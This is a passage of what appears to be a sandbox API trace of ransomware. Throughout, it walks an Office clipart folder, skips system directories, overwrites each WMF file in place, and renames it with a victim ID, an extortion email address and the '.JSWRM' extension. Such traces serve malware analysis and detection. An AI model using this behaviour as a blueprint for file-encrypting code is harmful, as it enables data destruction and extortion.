ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc88, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA01682_.WMF", cAlternateFileName="")) returned 1 [0092.260] lstrcmpiW (lpString1="NA01682_.WMF", lpString2=".") returned 1 [0092.260] lstrcmpiW (lpString1="NA01682_.WMF", lpString2="..") returned 1 [0092.260] lstrcmpiW (lpString1="NA01682_.WMF", lpString2="...") returned 1 [0092.260] lstrcmpiW (lpString1="NA01682_.WMF", lpString2="windows") returned -1 [0092.260] lstrcmpiW (lpString1="NA01682_.WMF", lpString2="recovery") returned -1 [0092.260] lstrcmpiW (lpString1="NA01682_.WMF", lpString2="perflogs") returned -1 [0092.260] lstrcmpiW (lpString1="NA01682_.WMF", lpString2="documents and settings") returned 1 [0092.260] lstrcmpiW (lpString1="NA01682_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0092.260] lstrcmpiW (lpString1="NA01682_.WMF", lpString2="system volume information") returned -1 [0092.260] lstrcmpiW (lpString1="NA01682_.WMF", lpString2="msocache") returned 1 [0092.260] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0092.260] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01682_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.260] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01682_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA01682_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.260] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0092.260] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0092.260] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01682_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.260] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01682_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA01682_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.260] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0092.260] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0092.260] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0092.260] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.260] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.260] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0092.260] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01682_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01682_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.261] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3208) returned 1 [0092.261] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.261] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc80) returned 0x23fc98 [0092.261] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xc80, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xc80, lpOverlapped=0x0) returned 1 [0092.266] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.266] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xc80, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xc80, lpOverlapped=0x0) returned 1 [0092.266] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0092.266] CloseHandle (hObject=0x314) returned 1 [0092.266] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0092.266] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.266] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0092.266] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.266] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0092.266] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0092.267] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.267] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0092.267] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.267] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0092.267] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0092.267] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0092.267] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0092.267] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0092.267] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01682_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01682_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01682_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01682_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.268] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0092.268] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0092.268] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0092.268] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf5f6d6e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf5f6d6e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf61cf5d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA01701_.WMF", cAlternateFileName="")) returned 1 [0092.268] lstrcmpiW (lpString1="NA01701_.WMF", lpString2=".") returned 1 [0092.268] lstrcmpiW (lpString1="NA01701_.WMF", lpString2="..") returned 1 [0092.268] lstrcmpiW (lpString1="NA01701_.WMF", lpString2="...") returned 1 [0092.268] lstrcmpiW (lpString1="NA01701_.WMF", lpString2="windows") returned -1 [0092.268] lstrcmpiW (lpString1="NA01701_.WMF", lpString2="recovery") returned -1 [0092.268] lstrcmpiW (lpString1="NA01701_.WMF", lpString2="perflogs") returned -1 [0092.268] lstrcmpiW (lpString1="NA01701_.WMF", lpString2="documents and settings") returned 1 [0092.268] lstrcmpiW (lpString1="NA01701_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0092.268] lstrcmpiW (lpString1="NA01701_.WMF", lpString2="system volume information") returned -1 [0092.268] lstrcmpiW (lpString1="NA01701_.WMF", lpString2="msocache") returned 1 [0092.268] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0092.269] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01701_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.269] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01701_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA01701_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.269] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0092.269] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0092.269] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01701_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.269] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01701_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA01701_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.269] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0092.269] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0092.269] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0092.269] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.269] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.269] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0092.269] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01701_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01701_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.269] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5316) returned 1 [0092.269] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.269] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14c0) returned 0x205850 [0092.269] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x14c0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x14c0, lpOverlapped=0x0) returned 1 [0092.271] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.271] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x14c0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x14c0, lpOverlapped=0x0) returned 1 [0092.271] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0092.271] CloseHandle (hObject=0x314) returned 1 [0092.271] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0092.271] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.271] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0092.271] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.271] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0092.271] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0092.271] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.271] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0092.271] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.272] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0092.272] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0092.272] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247a88 [0092.272] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0092.272] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0092.272] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01701_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01701_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01701_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01701_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.272] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0092.272] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0092.272] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0092.272] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf5f6d6e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf5f6d6e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf5f6d6e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x460, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA01848_.WMF", cAlternateFileName="")) returned 1 [0092.273] lstrcmpiW (lpString1="NA01848_.WMF", lpString2=".") returned 1 [0092.273] lstrcmpiW (lpString1="NA01848_.WMF", lpString2="..") returned 1 [0092.273] lstrcmpiW (lpString1="NA01848_.WMF", lpString2="...") returned 1 [0092.273] lstrcmpiW (lpString1="NA01848_.WMF", lpString2="windows") returned -1 [0092.273] lstrcmpiW (lpString1="NA01848_.WMF", lpString2="recovery") returned -1 [0092.273] lstrcmpiW (lpString1="NA01848_.WMF", lpString2="perflogs") returned -1 [0092.273] lstrcmpiW (lpString1="NA01848_.WMF", lpString2="documents and settings") returned 1 [0092.273] lstrcmpiW (lpString1="NA01848_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0092.273] lstrcmpiW (lpString1="NA01848_.WMF", lpString2="system volume information") returned -1 [0092.273] lstrcmpiW (lpString1="NA01848_.WMF", lpString2="msocache") returned 1 [0092.273] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0092.273] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01848_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.273] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01848_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA01848_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.273] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0092.273] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0092.273] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01848_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.273] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01848_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA01848_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.273] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0092.273] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0092.273] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0092.273] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.273] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.273] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0092.273] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01848_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01848_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.274] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1120) returned 1 [0092.274] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.274] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x460) returned 0x230a00 [0092.274] ReadFile (in: hFile=0x314, lpBuffer=0x230a00, nNumberOfBytesToRead=0x460, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesRead=0x345e89c*=0x460, lpOverlapped=0x0) returned 1 [0092.276] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.276] WriteFile (in: hFile=0x314, lpBuffer=0x230a00*, nNumberOfBytesToWrite=0x460, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesWritten=0x345e898*=0x460, lpOverlapped=0x0) returned 1 [0092.276] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x230a00 | out: hHeap=0x1e0000) returned 1 [0092.276] CloseHandle (hObject=0x314) returned 1 [0092.276] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0092.276] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.276] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0092.276] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.276] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0092.276] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0092.276] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.276] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0092.276] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.276] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0092.276] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0092.276] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0092.276] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0092.276] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0092.276] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01848_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01848_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01848_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01848_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.277] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0092.277] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0092.277] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0092.277] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf61cf5d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf61cf5d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf61cf5d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x270, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA01849_.WMF", cAlternateFileName="")) returned 1 [0092.277] lstrcmpiW (lpString1="NA01849_.WMF", lpString2=".") returned 1 [0092.277] lstrcmpiW (lpString1="NA01849_.WMF", lpString2="..") returned 1 [0092.277] lstrcmpiW (lpString1="NA01849_.WMF", lpString2="...") returned 1 [0092.277] lstrcmpiW (lpString1="NA01849_.WMF", lpString2="windows") returned -1 [0092.277] lstrcmpiW (lpString1="NA01849_.WMF", lpString2="recovery") returned -1 [0092.277] lstrcmpiW (lpString1="NA01849_.WMF", lpString2="perflogs") returned -1 [0092.277] lstrcmpiW (lpString1="NA01849_.WMF", lpString2="documents and settings") returned 1 [0092.277] lstrcmpiW (lpString1="NA01849_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0092.277] lstrcmpiW (lpString1="NA01849_.WMF", lpString2="system volume information") returned -1 [0092.277] lstrcmpiW (lpString1="NA01849_.WMF", lpString2="msocache") returned 1 [0092.277] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0092.278] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01849_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.278] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01849_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA01849_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.278] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0092.278] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0092.278] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01849_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 